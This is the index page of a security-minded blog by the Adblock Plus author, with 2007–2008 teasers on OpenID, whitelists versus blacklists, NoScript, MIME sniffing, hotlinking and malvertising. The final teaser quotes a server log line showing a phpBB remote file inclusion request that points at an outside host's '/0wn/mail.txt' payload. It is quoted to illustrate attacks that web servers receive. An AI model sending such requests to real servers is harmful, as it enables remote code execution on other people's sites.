Adblock Plus and (a little) more

Vulnerability or feature? · 2008-02-06 15:50 by Wladimir Palant

pdp over at GNUCITIZEN claims to have found a vulnerability in some common OpenID libraries. And I really tried hard to understand what he means and how it is related to the title of the article. In the end, I got the impression that he simply explains in a lengthy way that anybody could run an OpenID server and use it to log into OpenID-enabled services without having to register. Now isn’t this the whole purpose of OpenID?

Read more Comment [8]

Tags:

Adblock Plus for MicroB - great, but... · 2007-12-28 00:20 by Wladimir Palant

Today I looked at my logs and noticed lots of unusual referrer spam. For example, I saw people coming to adblockplus.org from wikipedia.org — not a particular article but the main site. Adblock Plus is not that famous yet so I investigated a little.

Read more Comment [10]

Tags:

Predictable whitelists strike again · 2007-11-05 17:18 by Wladimir Palant

A little more than half a year ago I wrote an article on how security solutions using whitelists are better than those using blacklists. At the same time I noted that even using whitelists is not always enough — for example when your whitelist is predictable and the attacker can make sure the whitelisting rule applies to him. NoScript extension was the example I used, and its author reacted by adding “XSS protection” assuming that this would invalidate my claims.

Read more Comment [13]

Tags:

The hazards of MIME sniffing · 2007-04-29 03:30 by Wladimir Palant

Webmasters probably know one particularly “helpful” feature of Internet Explorer — if you happen to misconfigure your web server and it sends HTML files designated as text files, Internet Explorer will silently correct this mistake and display the files anyway. Of course, if you wanted to display HTML as text (because you want to show the source code, or because it really is a text file with HTML snippets in it) it still will be displayed as HTML. And if you, as a user of a non-IE browser, ever came across a misconfigured server that displays HTML/images/Flash as plain text — now you know why nobody bothered fixing the mistake. This feature is called “MIME sniffing” and many articles have been written about it, so I don’t need to repeat them.

Read more Comment [12]

Tags:

Why you really should not hotlink · 2007-04-24 06:13 by Wladimir Palant

If you run a web site, you probably see this occasionally as well — people use your images, and instead of copying them over to their own servers they simply hotlink to your server. Now I don’t mind it when people use my images, nothing really worth protecting here. But I don’t like it when they start stealing my bandwidth and spamming my access logs.

Read more Comment [10]

Tags:

Legal implications of security research · 2007-04-08 16:23 by Wladimir Palant

The Chilling Effect is quite interesting read (yes, the article is a few months old but I only discovered it now). It shows nicely how security research on web applications is different from research on software you install on your computer. It also shows why responsible disclosure of vulnerabilities is so rare in this field. I also find it very interesting how it explains that most software is of a low quality.

Read more Comment [4]

Tags:

80% of malware served through ads? · 2007-03-28 03:45 by Wladimir Palant

PC World published an article on the analysis done by security firm Finjan that shows that 80% of all malicious code is served through online advertising. Now as with every statistic their selection might not have been representative, I have strong doubts that this number is accurate. But the trend is clear — there is much to be gained by infiltrating advertising networks, it allows hackers to inject their code into many sites including the ones where users don’t expect it. So the common advise to avoid visiting “shady” sites has once again lost some of its appeal, ads are displayed on “serious” sites as well. But I guess it will not stop most webmasters from trusting third-party content unconditionally by embedding scripts from third-party servers into their web pages. If these third-party servers get compromised their web site will be automatically affected as well, with identity stealing being the least serious consequence.

Read more Comment

Tags:

Usability vs. Security · 2007-03-25 01:53 by Wladimir Palant

Disclamer: This post is only about using NoScript as a security solution, not as a way to block annoyances.

It seems that me pointing out the fundamental flaw in NoScript only inspired another round of madness — that’s the only name I can find for it. Giorgio Maone has developed a solution that will effectively stop untrusted sites from injecting JavaScript through XSS holes in whitelisted sites. He is currently testing it with a development build and from what I can tell it mostly holds what it promises. Is that an achievement? Giorgio has obviously put much thought into this feature but I still have to say: no.

Read more Comment [19]

Tags:

Blacklists, whitelists, and security · 2007-03-15 04:13 by Wladimir Palant

I had a lengthy discussion with Giorgio Maone (author of the NoScript extension) about what is a security solution and what isn’t. Starting point was my statement that, while being excellent for getting rid of annoyances, neither Adblock Plus nor NoScript are really security solutions. Both have the potential, so why not?

Read more Comment [9]

Tags:

Running a web server is dangerous · 2007-01-17 15:57 by Wladimir Palant

I guess some of you run a web server. Maybe you have noticed entries like this one in your logs:

"GET /forum/admin/admin_styles.php?phpbb_root_path=http://some.server.name/0wn/mail.txt?%5d\r HTTP/1.1" 302 5 "-" "-"

Read more Comment [2]

Tags: